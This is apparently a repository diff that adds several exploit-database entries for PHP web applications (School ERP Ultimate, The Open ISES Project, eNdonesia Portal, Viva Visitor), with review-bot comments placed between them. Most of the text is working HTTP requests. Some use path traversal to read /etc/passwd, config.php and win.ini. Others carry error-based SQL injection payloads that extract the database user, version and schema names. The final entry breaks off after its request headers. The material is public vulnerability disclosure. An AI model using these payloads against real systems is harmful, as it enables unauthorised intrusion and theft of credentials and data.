@@ -0,0 +1,64 @@ +# Exploit Title: School ERP Ultimate 2018 - Arbitrary File Download +# Dork: N/A +# Date: 2018-10-21 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://freeschoolerp.com/ +# Software Link: http://freeschoolerp.com/schoolerp_30Nov2017_free.zip +# Software Link: https://sourceforge.net/projects/free-school-management-system/files/latest/download +# Version: 2018 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/student_staff/download.php?document=[FILE] +# http://localhost/[PATH]/office_admin/download.php?document=[FILE] +# +# /[PATH]/student_staff/download.php +# /[PATH]/office_admin/download.php +# .... +# if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") { +# $file = $_REQUEST['document']; +# header("Content-type: application/force-download"); +# header("Content-Transfer-Encoding: Binary"); +# header("Content-length: ".filesize($file)); +# header("Content-disposition: attachment; filename=\"".$file."\""); +# readfile($file); +# exit; +# } +# .... 
+ +GET /[PATH]/student_staff/download.php?document=download.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 00:30:01 GMT +Server: Apache +Content-Transfer-Encoding: Binary +Content-Disposition: attachment; filename="download.php" +Content-Length: 337 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download + +GET /[PATH]/office_admin/download.php?document=../../../../../etc/passwd HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 00:31:34 GMT +Server: Apache +Content-Transfer-Encoding: Binary +Content-Disposition: attachment; filename="../../../../../etc/passwd" +Content-Length: 46368 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/45645.txt b/exploits/php/webapps/45645.txt new file mode 100644 index 000000000..953aac55d --- /dev/null +++ b/exploits/php/webapps/45645.txt 
@@ -0,0 +1,184 @@
+# Exploit Title: The Open ISES Project 3.30A - 'tick_lat' SQL Injection
+# Dork: N/A
+# Date: 2018-10-18
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://openises.sourceforge.net/
+# Software Link: https://sourceforge.net/projects/openises/files/latest/download
+# Version: 3.30A_050318
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/main.php
+
+POST /[PATH]/main.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 241
+frm_passwd=') anD (SELect 155 FroM(SELECT COunt(*),COncaT(conCAT(0x203a20,UseR(),DatABASE(),VErSIoN()),0x7e,(seleCT (elT(155=155,1))),0x496873616e2053656e63616e,floOR(RAnd(0)*2))x frOM INFormATION_SchEMA.PLugINS GroUP BY x)a) And ('Efe'='Efe
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 16:53:16 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/
+Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 720
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/nearby.php?tick_lat=[SQL]&tick_lng=[SQL]
+
+GET /[PATH]/nearby.php?tick_lat=1)%20anD%20EXTRactVALUE(112,conCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELect%20(ELT(112=112,1))),0x496873616e2053656e63616e))%20AND%20(66=66&tick_lng=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 16:59:14 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 930
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 3)
+# http://localhost/[PATH]/ajax/form_post.php?id=[SQL]&ticket_id=[SQL]&q=1&function=editaction
+
+GET /[PATH]/ajax/form_post.php?id=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe&ticket_id=1&q=1&function=editaction HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 17:10:13 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/
+Content-Length: 1321
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 4)
+# http://localhost/[PATH]/sever_graph.php?p1=[SQL]
+
+GET /[PATH]/sever_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 17:26:55 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 931
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 5)
+# http://localhost/[PATH]/inc_types_graph.php?p1=[SQL]
+
+GET /[PATH]/inc_types_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 17:28:55 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 996
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 6)
+# http://localhost/[PATH]/city_graph.php?p1=[SQL]
+
+GET /[PATH]/city_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 17:30:23 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 927
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 7)
+# http://localhost/[PATH]/add_facnote.php?ticket_id=[SQL]
+
+GET /[PATH]/add_facnote.php?ticket_id=1+/*!00005ProcEDUre*/+/*!00005AnaLYSe*/+(extractvalue(0,/*!00005cONcat*/(0x27,0x3a,@@VErsion)),0)--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 17:36:28 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/
+Content-Length: 1642
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
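Review bot: The title names only `tick_lat`, but PoC 1 goes through the `frm_passwd` POST field of main.php and PoCs 3–7 through `id`, `p1` and `ticket_id`, so the header undersells the scope and a defender searching the index by parameter will miss most of it. A line listing every affected entry point would fix that, e.g. `# Parameters: frm_passwd (main.php), tick_lat/tick_lng (nearby.php), id (ajax/form_post.php), p1 (sever_graph.php, inc_types_graph.php, city_graph.php), ticket_id (add_facnote.php)`. Nothing records whether the vendor was contacted or which release, if any, addresses these; the entry should state that explicitly rather than leave it implied by `CVE: N/A`. PoC 1 also lacks a `Post / frm_passwd=[SQL]` hint under its URL, which the author's later entries in this same commit do provide.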
diff --git a/exploits/php/webapps/45646.txt b/exploits/php/webapps/45646.txt
new file mode 100644
index 000000000..e8737f327
--- /dev/null
+++ b/exploits/php/webapps/45646.txt
@@ -0,0 +1,34 @@
+# Exploit Title: School ERP Ultimate 2018 - 'fid' SQL Injection
+# Dork: N/A
+# Date: 2018-10-21
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://freeschoolerp.com/
+# Software Link: http://freeschoolerp.com/schoolerp_30Nov2017_free.zip
+# Software Link: https://sourceforge.net/projects/free-school-management-system/files/latest/download
+# Version: 2018
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/student_staff/?pid=54&action=staff_timetable&fid=[SQL]
+
+GET /[PATH]/student_staff/?pid=54&action=staff_timetable&fid=-%31%20%75%6e%49%6f%4e%20%73%45%6c%45%63%74%20%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=nno01rkuj0ql0k1sb96uhg1va1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sun, 21 Oct 2018 00:11:18 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 68790
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45654.txt b/exploits/php/webapps/45654.txt
new file mode 100644
index 000000000..9ba8d642a
--- /dev/null
+++ b/exploits/php/webapps/45654.txt
@@ -0,0 +1,154 @@
+# Exploit Title: eNdonesia Portal 8.7 - 'artid' SQL Injection
+# Dork: N/A
+# Date: 2018-10-21
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.endonesia.org/
+# Software Link: https://sourceforge.net/projects/endonesia/files/latest/download
+# Version: 8.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/mod.php?mod=publisher&op=viewarticle&artid=[SQL]
+
+GET /[PATH]/mod.php?mod=publisher&op=viewarticle&artid=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sun, 21 Oct 2018 01:04:32 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/mod.php?mod=publisher&op=viewcat&cid=[SQL]
+
+GET /[PATH]/mod.php?mod=publisher&op=viewcat&cid=4%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sun, 21 Oct 2018 01:08:12 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 7597
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 3)
+# http://localhost/[PATH]/mod.php?mod=diskusi&op=viewdisk&did=[SQL]
+
+GET /[PATH]/mod.php?mod=diskusi&op=viewdisk&did=4%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sun, 21 Oct 2018 01:12:43 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5777
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 4)
+# http://localhost/[PATH]/mod.php?mod=galeri&op=view_album&cid=[SQL]
+
+GET /[PATH]/mod.php?mod=galeri&op=view_album&cid=5%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sun, 21 Oct 2018 01:16:24 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 4671
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 5)
+# http://localhost/[PATH]/mod.php?mod=content&op=viewcontent&contid=[SQL]
+
+GET /[PATH]/mod.php?mod=content&op=viewcontent&contid=11%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sun, 21 Oct 2018 01:19:14 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 4644
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 6)
+# http://localhost/[PATH]/mod.php?mod=content&op=viewcontent&contid=[SQL]
+
+GET /[PATH]/mod.php?mod=about&op=viewabout&aboutid=1%27||(SELEct%20%27Efe%27%20FRom%20DUal%20WHERE%20113=113%20anD%20(SeleCT%20156%20FRom(SElecT%20CouNT(*),coNcaT(CONCat(0x203a20,USeR(),DatABAse(),verSIoN()),(SEleCT%20(Elt(156=156,1))),FLooR(RAnd(0)*2))x%20frOM%20InFORmaTION_SCHemA.PLugiNS%20GRouP%20BY%20x)a))||%27 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sun, 21 Oct 2018 01:23:41 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 7072
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45655.txt b/exploits/php/webapps/45655.txt
new file mode 100644
index 000000000..73e45ad41
--- /dev/null
+++ b/exploits/php/webapps/45655.txt
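Review bot: The PoC 6 heading repeats PoC 5's URL (`mod=content&op=viewcontent&contid=[SQL]`) while the request beneath it targets `mod=about&op=viewabout&aboutid=`, so the sixth injection point is mislabeled and anyone grepping the entry for `aboutid` will not find a heading for it. It should read `# http://localhost/[PATH]/mod.php?mod=about&op=viewabout&aboutid=[SQL]`. The title names `artid` alone even though `cid`, `did`, `contid` and `aboutid` are demonstrated too; listing all five in the header would let a defender match the entry against request logs by parameter. As with the other entries in this commit, no vendor contact, fix or remediation is recorded.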
@@ -0,0 +1,56 @@
+# Exploit Title: The Open ISES Project 3.30A - Arbitrary File Download
+# Dork: N/A
+# Date: 2018-10-18
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://openises.sourceforge.net/
+# Software Link: https://sourceforge.net/projects/openises/files/latest/download
+# Version: 3.30A_050318
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/ajax/download.php?filename=[FILE]&origname=&type=
+
+GET /[PATH]/ajax/download.php?filename=../config.php&origname=&type= HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 17:20:09 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Disposition: attachment; filename="";
+Content-Transfer-Encoding: binary
+Pragma: public
+Cache-Control: must-revalidate, post-check=0, pre-check=0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: {$filetype}
+
+GET /[PATH]/ajax/download.php?filename=../../../../../Windows/win.ini&origname=&type= HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2018 17:23:53 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Disposition: attachment; filename="";
+Content-Transfer-Encoding: binary
+Pragma: public
+Cache-Control: must-revalidate, post-check=0, pre-check=0
+Content-Length: 564
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: {$filetype}
\ No newline at end of file
diff --git a/exploits/php/webapps/45656.txt b/exploits/php/webapps/45656.txt
new file mode 100644
index 000000000..9fb372b5e
--- /dev/null
+++ b/exploits/php/webapps/45656.txt
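Review bot: Both responses carry `Content-Type: {$filetype}` and `Content-Disposition: attachment; filename="";` — the literal, uninterpolated variable name and an empty filename — which the advisory reproduces but never comments on; it looks like the headers are built from a string that is never interpolated (not verifiable from the page), and either way it is a cheap log-side fingerprint for this endpoint that defenders would want called out. The heading also lists `origname` and `type` as parameters without saying whether they matter; if only `filename` is required, say so, and if the others change behaviour, show it. As with the sibling entries, the note should close with the remediation (serve only files resolved under a fixed directory, or look them up by id) and whether the vendor was notified.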
@@ -0,0 +1,90 @@
+# Exploit Title: Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection
+# Dork: N/A
+# Date: 2018-10-19
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://viva-visitor.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/viva-visitor/files/latest/download
+# Version: 0.95.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/repeat_verify-n.php
+# Post / fname=[SQL]
+
+POST /[PATH]/repeat_verify-n.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 516
